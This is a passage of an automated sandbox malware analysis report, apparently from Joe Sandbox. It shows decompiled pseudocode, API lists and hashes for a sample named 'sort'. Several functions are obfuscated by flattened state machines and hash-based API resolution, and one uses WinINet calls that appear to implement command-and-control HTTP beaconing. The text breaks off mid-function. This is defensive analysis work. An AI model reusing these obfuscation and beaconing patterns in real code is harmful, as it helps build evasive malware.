                                            							_t42 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
                                            						} else {
                                            							_t42 = GlobalAlloc(0x2002, _t73 << 3); // executed
                                            						}
                                            						 *(_t74 + 0x10) = _t42;
                                            						if(_t42 == 0) {
                                            							_t15 = _t71 + 0x10; // 0x4c0158
                                            							GlobalLock(GlobalHandle( *_t15));
                                            							_t16 = _t74 + 0x14; // 0x406468
                                            							LeaveCriticalSection( *_t16);
                                            							E0041007F(_t65);
                                            						}
                                            						_t63 = GlobalLock( *(_t74 + 0x10));
                                            						_t18 = _t71 + 4; // 0x20
                                            						E00406330(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
                                            						_t74 = _t74 + 0xc;
                                            						 *(_t71 + 0x10) = _t63;
                                            						 *(_t71 + 4) = _t73;
                                            					} else {
                                            						_t10 = _t71 + 0x10; // 0x4c0158
                                            						_t58 =  *_t10 + 8;
                                            						while(( *_t58 & 0x00000001) != 0) {
                                            							_t70 = _t70 + 1;
                                            							_t58 =  &(_t58[8]);
                                            							if(_t70 < _t72) {
                                            								continue;
                                            							}
                                            							break;
                                            						}
                                            						if(_t70 >= _t72) {
                                            							goto L7;
                                            						}
                                            					}
                                            				} else {
                                            					_t5 = _t71 + 0x10; // 0x4c0158
                                            					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
                                            						goto L2;
                                            					}
                                            				}
                                            				_t23 = _t71 + 0xc; // 0x4
                                            				if(_t70 >=  *_t23) {
                                            					_t24 = _t70 + 1; // 0x5
                                            					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
                                            				}
                                            				_t26 = _t71 + 0x10; // 0x4c0158
                                            				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
                                            				_t34 = _t70 + 1; // 0x5
                                            				 *(_t71 + 8) = _t34;
                                            				LeaveCriticalSection( *(_t74 + 0x10));
                                            				return _t70;
                                            			}

                                            APIs
                                            • EnterCriticalSection.KERNEL32(004399C8,004397CC,00000000,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042593A
                                            • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042598F
                                            • GlobalHandle.KERNEL32 ref: 00425998
                                            • GlobalUnlock.KERNEL32(00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259A1
                                            • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004259B3
                                            • GlobalHandle.KERNEL32 ref: 004259CA
                                            • GlobalLock.KERNEL32 ref: 004259D1
                                            • LeaveCriticalSection.KERNEL32(hd@,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259D7
                                            • GlobalLock.KERNEL32 ref: 004259E6
                                            • LeaveCriticalSection.KERNEL32(?), ref: 00425A2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                            • String ID: hd@
                                            • API String ID: 2667261700-3469257913
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 100%
                                            			E004171BC(void* __ecx) {
                                            				int _t6;
                                            				struct HDC__* _t17;
                                            				void* _t18;
                                            
                                            				_t18 = __ecx;
                                            				_t6 = GetSystemMetrics(0xb); // executed
                                            				 *((intOrPtr*)(_t18 + 8)) = _t6;
                                            				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
                                            				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
                                            					E00426041();
                                            				} else {
                                            					E00426011();
                                            				}
                                            				_t17 = GetDC(0);
                                            				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
                                            				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
                                            				return ReleaseDC(0, _t17);
                                            			}







                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL ref: 004171C9
                                            • GetSystemMetrics.USER32 ref: 004171D0
                                            • GetDC.USER32(00000000), ref: 004171E9
                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 004171FA
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00417202
                                            • ReleaseDC.USER32 ref: 0041720A
                                              • Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 00426023
                                              • Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 0042602D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                            • String ID:
                                            • API String ID: 1031845853-0
                                            • Opcode ID: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
                                            • Instruction ID: 659ed99cd56d5ad3ccdcd4dadc3a54c49a5c6667fc5102f6d19300758eb0a966
                                            • Opcode Fuzzy Hash: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
                                            • Instruction Fuzzy Hash: BBF03030740704AEE230AB629C89B67B7A4EF80755F51442FFA0196290CFB498459FA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 76%
                                            			E02272C20(void* __ecx, void* __edx) {
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t36;
                                            				void* _t38;
                                            				void* _t40;
                                            				void* _t47;
                                            				signed int _t51;
                                            				void* _t52;
                                            				void* _t58;
                                            				void* _t60;
                                            				void* _t61;
                                            				void* _t62;
                                            				void* _t65;
                                            				void* _t66;
                                            				WCHAR* _t68;
                                            				void* _t83;
                                            				void* _t87;
                                            				void* _t132;
                                            				void* _t133;
                                            				void* _t135;
                                            				void* _t136;
                                            				void* _t138;
                                            				WCHAR* _t140;
                                            				long _t142;
                                            				void* _t146;
                                            				void* _t147;
                                            				void* _t150;
                                            				void* _t151;
                                            
                                            				_t146 =  *(_t147 + 0x3c);
                                            				 *(_t147 + 0x30) = __ecx;
                                            				_t136 = 0x21ed7693;
                                            				_t83 =  *(_t147 + 0x30);
                                            				 *(_t147 + 0x30) = __edx;
                                            				 *(_t147 + 0x14) = 0;
                                            				 *(_t147 + 0x24) = 0;
                                            				 *(_t147 + 0x20) = 0;
                                            				 *(_t147 + 0x10) = 0;
                                            				while(1) {
                                            					L1:
                                            					_t132 =  *(_t147 + 0x18);
                                            					while(1) {
                                            						L2:
                                            						_t150 = _t136 - 0xdefb712;
                                            						if(_t150 > 0) {
                                            							goto L36;
                                            						}
                                            						L3:
                                            						if(_t150 == 0) {
                                            							__eflags =  *0x227e12c;
                                            							if( *0x227e12c == 0) {
                                            								 *0x227e12c = E02273E80(_t83, E02273F20(0x2ba535f4), 0xc71f7f57, _t146);
                                            							}
                                            							_t36 = InternetOpenW( *(_t147 + 0x24), 0, 0, 0, 0); // executed
                                            							__eflags = _t36;
                                            							 *(_t147 + 0x1c) = _t36;
                                            							_t136 =  !=  ? 0x2a5ea3fb : 0xe955358;
                                            							_t38 =  *0x227dea8;
                                            							__eflags = _t38;
                                            							if(_t38 == 0) {
                                            								_t38 = E02273E80(_t83, E02273F20(0xbb398380), 0x97f883e, _t146);
                                            								 *0x227dea8 = _t38;
                                            							}
                                            							_t133 =  *_t38();
                                            							_t40 =  *0x227e1a0;
                                            							__eflags = _t40;
                                            							if(_t40 == 0) {
                                            								_t40 = E02273E80(_t83, E02273F20(0xbb398380), 0x26c3f343, _t146);
                                            								 *0x227e1a0 = _t40;
                                            							}
                                            							 *_t40(_t133, 0,  *(_t147 + 0x14));
                                            							goto L34;
                                            						} else {
                                            							_t151 = _t136 - 0x67ae942;
                                            							if(_t151 > 0) {
                                            								__eflags = _t136 - 0x6b479f3;
                                            								if(_t136 == 0x6b479f3) {
                                            									__eflags =  *0x227e128;
                                            									if( *0x227e128 == 0) {
                                            										 *0x227e128 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x6972c784, _t146);
                                            									}
                                            									InternetCloseHandle(_t83); // executed
                                            									_t136 = 0x12dff647;
                                            									continue;
                                            								} else {
                                            									__eflags = _t136 - 0x8581448;
                                            									if(_t136 != 0x8581448) {
                                            										goto L34;
                                            									} else {
                                            										__eflags = _t146;
                                            										if(_t146 == 0) {
                                            											_t140 =  *(_t147 + 0x20);
                                            										} else {
                                            											_t140 = E022734C0(0x227d1f0);
                                            											 *(_t147 + 0x20) = _t140;
                                            										}
                                            										_t52 =  *0x227e1cc;
                                            										__eflags = _t52;
                                            										if(_t52 == 0) {
                                            											_t52 = E02273E80(_t83, E02273F20(0x2ba535f4), 0xc136cec1, _t146);
                                            											 *0x227e1cc = _t52;
                                            										}
                                            										_t83 =  *_t52(_t132, _t140,  *((intOrPtr*)(_t147 + 0x50)), 0, 0, 0, 0x844cc300, 0);
                                            										E02273460(_t140);
                                            										__eflags = _t83;
                                            										_t136 =  !=  ? 0x4e6dd92 : 0x12dff647;
                                            										continue;
                                            									}
                                            								}
                                            							} else {
                                            								if(_t151 == 0) {
                                            									__eflags = E022729B0(_t83,  *((intOrPtr*)(_t147 + 0x48)));
                                            									_t87 =  !=  ? 1 :  *(_t147 + 0x10);
                                            									__eflags = _t87;
                                            									 *(_t147 + 0x10) = _t87;
                                            									L15:
                                            									_t136 = 0x6b479f3;
                                            									continue;
                                            								} else {
                                            									if(_t136 == 0x1e6c40f) {
                                            										_t47 =  *0x227e128;
                                            										__eflags = _t47;
                                            										if(_t47 == 0) {
                                            											_t47 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x6972c784, _t146);
                                            											 *0x227e128 = _t47;
                                            										}
                                            										 *_t47( *(_t147 + 0x1c));
                                            									} else {
                                            										if(_t136 != 0x4e6dd92) {
                                            											L34:
                                            											__eflags = _t136 - 0xe955358;
                                            											if(_t136 != 0xe955358) {
                                            												goto L1;
                                            											}
                                            										} else {
                                            											if(_t146 == 0) {
                                            												_t142 = 0;
                                            												_t135 = 0;
                                            												__eflags = 0;
                                            											} else {
                                            												_t142 =  *(_t146 + 4);
                                            												_t135 =  *_t146;
                                            											}
                                            											if( *0x227e20c == 0) {
                                            												 *0x227e20c = E02273E80(_t83, E02273F20(0x2ba535f4), 0x182fe063, _t146);
                                            											}
                                            											_t51 = HttpSendRequestW(_t83,  *(_t147 + 0x4c), 0xffffffff, _t135, _t142); // executed
                                            											asm("sbb esi, esi");
                                            											_t136 = ( ~_t51 & 0x1a4d9a07) + 0x6b479f3;
                                            											while(1) {
                                            												L1:
                                            												_t132 =  *(_t147 + 0x18);
                                            												while(1) {
                                            													L2:
                                            													_t150 = _t136 - 0xdefb712;
                                            													if(_t150 > 0) {
                                            														goto L36;
                                            													}
                                            													goto L3;
                                            												}
                                            												goto L36;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						L64:
                                            						return  *(_t147 + 0x10);
                                            						L65:
                                            						L36:
                                            						__eflags = _t136 - 0x210213fa;
                                            						if(__eflags > 0) {
                                            							__eflags = _t136 - 0x21ed7693;
                                            							if(_t136 == 0x21ed7693) {
                                            								_t136 = 0x1e47f06d;
                                            								continue;
                                            							} else {
                                            								__eflags = _t136 - 0x2a5ea3fb;
                                            								if(_t136 != 0x2a5ea3fb) {
                                            									goto L34;
                                            								} else {
                                            									__eflags =  *0x227e178;
                                            									if( *0x227e178 == 0) {
                                            										 *0x227e178 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x48c489b5, _t146);
                                            									}
                                            									_t58 = InternetConnectW( *(_t147 + 0x38),  *(_t147 + 0x4c),  *(_t147 + 0x44), 0, 0, 3, 0, 0); // executed
                                            									_t132 = _t58;
                                            									__eflags = _t132;
                                            									 *(_t147 + 0x18) = _t132;
                                            									_t136 =  !=  ? 0x8581448 : 0x1e6c40f;
                                            									continue;
                                            								}
                                            							}
                                            						} else {
                                            							if(__eflags == 0) {
                                            								_t60 =  *0x227dde8;
                                            								 *((intOrPtr*)(_t147 + 0x28)) = 4;
                                            								__eflags = _t60;
                                            								if(_t60 == 0) {
                                            									_t60 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x46124712, _t146);
                                            									 *0x227dde8 = _t60;
                                            								}
                                            								_t61 =  *_t60(_t83, 0x20000013, _t147 + 0x34, _t147 + 0x2c, 0);
                                            								__eflags = _t61;
                                            								if(_t61 == 0) {
                                            									goto L15;
                                            								} else {
                                            									__eflags =  *((intOrPtr*)(_t147 + 0x2c)) - 0xc8;
                                            									if( *((intOrPtr*)(_t147 + 0x2c)) != 0xc8) {
                                            										goto L15;
                                            									} else {
                                            										_t136 = 0x67ae942;
                                            										continue;
                                            									}
                                            								}
                                            								goto L65;
                                            							} else {
                                            								__eflags = _t136 - 0x12dff647;
                                            								if(_t136 == 0x12dff647) {
                                            									_t62 =  *0x227e128;
                                            									__eflags = _t62;
                                            									if(_t62 == 0) {
                                            										_t62 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x6972c784, _t146);
                                            										 *0x227e128 = _t62;
                                            									}
                                            									 *_t62(_t132);
                                            									_t136 = 0x1e6c40f;
                                            									continue;
                                            								} else {
                                            									__eflags = _t136 - 0x1e47f06d;
                                            									if(_t136 != 0x1e47f06d) {
                                            										goto L34;
                                            									} else {
                                            										 *(_t147 + 0x24) = 0x200;
                                            										_t138 = E022742F0(_t83, 0x200);
                                            										__eflags = _t138;
                                            										if(_t138 != 0) {
                                            											_t65 =  *0x227dbf0;
                                            											__eflags = _t65;
                                            											if(_t65 == 0) {
                                            												_t65 = E02273E80(_t83, E02273F20(0x50c9f0c1), 0xd16bf1bd, _t146);
                                            												 *0x227dbf0 = _t65;
                                            											}
                                            											_t66 =  *_t65(0, _t138, _t147 + 0x24); // executed
                                            											__eflags = _t66;
                                            											if(_t66 == 0) {
                                            												_t68 = E022756A0(_t138, _t146);
                                            												_t147 = _t147 - 8 + 8;
                                            												 *(_t147 + 0x14) = _t68;
                                            											}
                                            											E02274250(_t83, _t138);
                                            										}
                                            										_t136 = 0xdefb712;
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L64;
                                            					}
                                            				}
                                            			}































                                            0x00000000
                                            0x02272c66
                                            0x00000000
                                            0x02272c60
                                            0x02272c5a
                                            0x02272c92
                                            0x02272c86
                                            0x02272c7e
                                            0x02272c78
                                            0x02273032
                                            0x0227303d
                                            0x00000000
                                            0x02272e75
                                            0x02272e75
                                            0x02272e7b
                                            0x02272f94
                                            0x02272f9a
                                            0x02272ffe
                                            0x00000000
                                            0x02272f9c
                                            0x02272f9c
                                            0x02272fa2
                                            0x00000000
                                            0x02272fa8
                                            0x02272fad
                                            0x02272faf
                                            0x02272fc7
                                            0x02272fc7
                                            0x02272fe2
                                            0x02272fe4
                                            0x02272feb
                                            0x02272fed
                                            0x02272ff6
                                            0x00000000
                                            0x02272ff6
                                            0x02272fa2
                                            0x02272e81
                                            0x02272e81
                                            0x02272f34
                                            0x02272f39
                                            0x02272f41
                                            0x02272f43
                                            0x02272f56
                                            0x02272f5b
                                            0x02272f5b
                                            0x02272f72
                                            0x02272f74
                                            0x02272f76
                                            0x00000000
                                            0x02272f7c
                                            0x02272f7c
                                            0x02272f84
                                            0x00000000
                                            0x02272f8a
                                            0x02272f8a
                                            0x00000000
                                            0x02272f8a
                                            0x02272f84
                                            0x00000000
                                            0x02272e87
                                            0x02272e87
                                            0x02272e8d
                                            0x02272f03
                                            0x02272f08
                                            0x02272f0a
                                            0x02272f1d
                                            0x02272f22
                                            0x02272f22
                                            0x02272f28
                                            0x02272f2a
                                            0x00000000
                                            0x02272e8f
                                            0x02272e8f
                                            0x02272e95
                                            0x00000000
                                            0x02272e97
                                            0x02272e9c
                                            0x02272ea9
                                            0x02272eab
                                            0x02272ead
                                            0x02272eaf
                                            0x02272eb4
                                            0x02272eb6
                                            0x02272ec9
                                            0x02272ece
                                            0x02272ece
                                            0x02272edb
                                            0x02272edd
                                            0x02272edf
                                            0x02272ee6
                                            0x02272eeb
                                            0x02272eee
                                            0x02272eee
                                            0x02272ef4
                                            0x02272ef4
                                            0x02272ef9
                                            0x00000000
                                            0x02272ef9
                                            0x02272e95
                                            0x02272e8d
                                            0x02272e81
                                            0x00000000
                                            0x02272e7b
                                            0x02272c60

                                            APIs
                                            • HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 02272CD5
                                            • InternetCloseHandle.WININET(?), ref: 02272DBE
                                            • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02272DFA
                                            • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 02272EDB
                                            • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02272FE2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                            • String ID:
                                            • API String ID: 1741791824-0
                                            • Opcode ID: 242b5854ad4a7032566ae32ac915e9901e387c83cceecce777e132cecc74f88f
                                            • Instruction ID: 2869421f3be6f6d634546d21f6230eb55cf17e08cfce5925a843db82c1f4880d
                                            • Opcode Fuzzy Hash: 242b5854ad4a7032566ae32ac915e9901e387c83cceecce777e132cecc74f88f
                                            • Instruction Fuzzy Hash: D2A1C072F2C302DBDB14AAE49C8572F76E6AB84644F011A6DEC55EB358DB709C009BD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 401 22730d0-22730e6 402 22730ea-22730ef 401->402 403 22730f0-22730f5 402->403 404 22731ac-22731b1 403->404 405 22730fb 403->405 408 2273226-22732b0 404->408 409 22731b3-22731b8 404->409 406 2273101-2273106 405->406 407 2273198-227319c 405->407 410 22732b5-22732bd 406->410 411 227310c-2273111 406->411 412 2273303-227330d 407->412 413 22731a2-22731a7 407->413 408->403 414 22731ec-22731f4 409->414 415 22731ba-22731bf 409->415 420 22732bf-22732d7 call 2273f20 call 2273e80 410->420 421 22732dd-2273300 410->421 418 2273113-2273118 411->418 419 227312e-2273135 411->419 413->403 416 22731f6-227320e call 2273f20 call 2273e80 414->416 417 2273214-2273221 414->417 422 22731d4-22731d9 415->422 423 22731c1-22731cf 415->423 416->417 417->402 418->422 426 227311e-227312c call 2273d10 418->426 427 2273137-227314d call 2273f20 call 2273e80 419->427 428 2273152-227315d 419->428 420->421 421->412 422->403 424 22731df-22731e9 422->424 423->403 426->402 427->428 442 227315f-2273175 call 2273f20 call 2273e80 428->442 443 227317a-2273188 RtlAllocateHeap 428->443 442->443 443->412 447 227318e-2273193 443->447 447->402
                                            C-Code - Quality: 71%
                                            			E022730D0() {
                                            				void* __ebx;
                                            				void* __ecx;
                                            				void* __ebp;
                                            				void* _t52;
                                            				intOrPtr* _t68;
                                            				void* _t71;
                                            				intOrPtr _t76;
                                            				intOrPtr _t77;
                                            				intOrPtr* _t85;
                                            				intOrPtr* _t90;
                                            				signed int _t95;
                                            				void* _t100;
                                            				void* _t101;
                                            				signed int _t102;
                                            				void* _t103;
                                            				void* _t104;
                                            
                                            				_t76 =  *((intOrPtr*)(_t103 + 0xc));
                                            				_t52 = 0x22788346;
                                            				_t102 =  *(_t103 + 0x10);
                                            				_t100 =  *(_t103 + 0x14);
                                            				_t95 =  *(_t103 + 0x18);
                                            				while(1) {
                                            					L1:
                                            					do {
                                            						while(1) {
                                            							L2:
                                            							_t104 = _t52 - 0xec2173f;
                                            							if(_t104 <= 0) {
                                            								break;
                                            							}
                                            							if(_t52 == 0x22788346) {
                                            								 *(_t103 + 0x10) = 0x3d53;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) << 5;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffff5fed;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 8;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) + 0xffffd292;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 4;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) | 0x4ce86fd0;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) >> 0xe;
                                            								 *(_t103 + 0x10) =  *(_t103 + 0x10) ^ 0x8e6c81db;
                                            								 *(_t103 + 0x18) = 0xed42;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 0xd;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xf090f06a;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x58;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) << 4;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0xffffb93b;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) + 0x26;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) | 0xa9426d85;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) * 0x2a;
                                            								_t52 = 0x27153269;
                                            								 *(_t103 + 0x18) =  *(_t103 + 0x18) ^ 0xfad5ac24;
                                            								continue;
                                            							} else {
                                            								if(_t52 == 0x27153269) {
                                            									_t85 =  *0x227ddd0;
                                            									if(_t85 == 0) {
                                            										_t85 = E02273E80(_t76, E02273F20(0x7539f5a2), 0xf789cbad, _t102);
                                            										 *0x227ddd0 = _t85;
                                            									}
                                            									_t95 =  *_t85(_t102 + 0x2c);
                                            									_t52 = 0xb58c94f;
                                            									while(1) {
                                            										L1:
                                            										goto L2;
                                            									}
                                            								} else {
                                            									if(_t52 != 0x302165a1) {
                                            										goto L20;
                                            									} else {
                                            										_t52 =  ==  ? 0x7338f4f : 0xec2173f;
                                            										continue;
                                            									}
                                            								}
                                            							}
                                            							L30:
                                            						}
                                            						if(_t104 == 0) {
                                            							if(_t76 !=  *(_t103 + 0x10)) {
                                            								goto L29;
                                            							} else {
                                            								_t52 = 0x7338f4f;
                                            								goto L2;
                                            							}
                                            						} else {
                                            							if(_t52 == 0x26fef4f) {
                                            								_t90 =  *0x227e25c;
                                            								if(_t90 == 0) {
                                            									_t90 = E02273E80(_t76, E02273F20(0xbb398380), 0x5b27858b, _t102);
                                            									 *0x227e25c = _t90;
                                            								}
                                            								 *_t90(_t100 + 0x14, _t102 + 0x2c, (_t95 - _t102 - 0x2c >> 1) + 1);
                                            								_t77 =  *((intOrPtr*)(_t103 + 0x1c));
                                            								 *(_t100 + 0x224) =  *(_t77 + 0x1c);
                                            								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
                                            								 *(_t77 + 0x1c) = _t100;
                                            								goto L29;
                                            							} else {
                                            								if(_t52 == 0x7338f4f) {
                                            									_t68 =  *0x227dea8;
                                            									if(_t68 == 0) {
                                            										_t68 = E02273E80(_t76, E02273F20(0xbb398380), 0x97f883e, _t102);
                                            										 *0x227dea8 = _t68;
                                            									}
                                            									_t101 =  *_t68();
                                            									if( *0x227dcec == 0) {
                                            										 *0x227dcec = E02273E80(_t76, E02273F20(0xbb398380), 0xe9233692, _t102);
                                            									}
                                            									_t71 = RtlAllocateHeap(_t101, 8, 0x228); // executed
                                            									_t100 = _t71;
                                            									if(_t100 == 0) {
                                            										L29:
                                            										return 1;
                                            									} else {
                                            										_t52 = 0x26fef4f;
                                            										goto L1;
                                            									}
                                            								} else {
                                            									if(_t52 != 0xb58c94f) {
                                            										goto L20;
                                            									} else {
                                            										_t76 = E02273D10(_t95);
                                            										_t52 = 0x302165a1;
                                            										while(1) {
                                            											L1:
                                            											goto L2;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L30;
                                            						L20:
                                            					} while (_t52 != 0x2c4ed872);
                                            					return 1;
                                            					goto L30;
                                            				}
                                            			}




















                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02273182
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true
                                            • Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp
                                            • Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2270000_sort.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: &$B$S=
                                            • API String ID: 1279760036-3580750612
                                            • Opcode ID: 3de0bc0aa069930e2fe8fa651626b298f834ac3f84be0f221b0eadeee996a580
                                            • Instruction ID: c39e9db4d3230ba168f628656b658005be21b42b73c8895fd42cd55cf610a729
                                            • Opcode Fuzzy Hash: 3de0bc0aa069930e2fe8fa651626b298f834ac3f84be0f221b0eadeee996a580
                                            • Instruction Fuzzy Hash: 0251B372A2C3029BCB18DEA8949852FB7E6FFD4244F10489EF045C7218DB70D9499BD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 494 2279c10-2279c1e 495 2279c20-2279c25 494->495 496 2279cd3-2279cd8 495->496 497 2279c2b 495->497 498 2279c43-2279c48 496->498 499 2279cde-2279ce5 496->499 500 2279c31-2279c36 497->500 501 2279cc9-2279cce 497->501 498->495 502 2279c4a-2279c55 498->502 503 2279ce7-2279cfd call 2273f20 call 2273e80 499->503 504 2279d02-2279d18 499->504 505 2279c56-2279c66 500->505 506 2279c38-2279c3d 500->506 501->495 503->504 504->495 509 2279c86-2279c8e 505->509 510 2279c68-2279c80 call 2273f20 call 2273e80 505->510 506->498 507 2279d1d-2279d24 506->507 516 2279d26-2279d3c call 2273f20 call 2273e80 507->516 517 2279d41-2279d65 lstrcmpiW 507->517 513 2279c90-2279ca8 call 2273f20 call 2273e80 509->513 514 2279cae-2279cc4 GetCurrentProcess QueryFullProcessImageNameW 509->514 510->509 513->514 514->495 516->517
                                            C-Code - Quality: 79%
                                            			E02279C10(void* __ebp) {
                                            				short _v520;
                                            				short _v1040;
                                            				char _v1044;
                                            				void* __ebx;
                                            				void* _t7;
                                            				intOrPtr* _t9;
                                            				intOrPtr* _t43;
                                            				void* _t46;
                                            				void* _t49;
                                            
                                            				_t46 = __ebp;
                                            				_t7 = 0x2c176d24;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t49 = _t7 - 0x2c176d24;
                                            						if(_t49 > 0) {
                                            							break;
                                            						}
                                            						if(_t49 == 0) {
                                            							_t7 = 0x2ca09120;
                                            							continue;
                                            						} else {
                                            							if(_t7 == 0x17e35087) {
                                            								_v1044 = 0x104;
                                            								if( *0x227ded0 == 0) {
                                            									 *0x227ded0 = E02273E80(0, E02273F20(0xbb398380), 0x23563937, _t46);
                                            								}
                                            								_t43 =  *0x227df2c;
                                            								if(_t43 == 0) {
                                            									_t43 = E02273E80(0, E02273F20(0xbb398380), 0xd0ee7032, _t46);
                                            									 *0x227df2c = _t43;
                                            								}
                                            								 *_t43(GetCurrentProcess(), 0,  &_v1040,  &_v1044); // executed
                                            								_t7 = 0x2c13ef60;
                                            								continue;
                                            							} else {
                                            								if(_t7 == 0x2c13ef60) {
                                            									if( *0x227dd80 == 0) {
                                            										 *0x227dd80 = E02273E80(0, E02273F20(0xbb398380), 0xcb2f8494, _t46);
                                            									}
                                            									lstrcmpiW( &_v520,  &_v1040); // executed
                                            									_t26 =  !=  ? 1 : 0;
                                            									_t22 =  !=  ? 1 : 0;
                                            									return  !=  ? 1 : 0;
                                            								} else {
                                            									goto L5;
                                            								}
                                            							}
                                            						}
                                            						L20:
                                            					}
                                            					if(_t7 != 0x2ca09120) {
                                            						goto L5;
                                            					} else {
                                            						_t9 =  *0x227de58;
                                            						if(_t9 == 0) {
                                            							_t9 = E02273E80(0, E02273F20(0xbb398380), 0xb1aefb5, _t46);
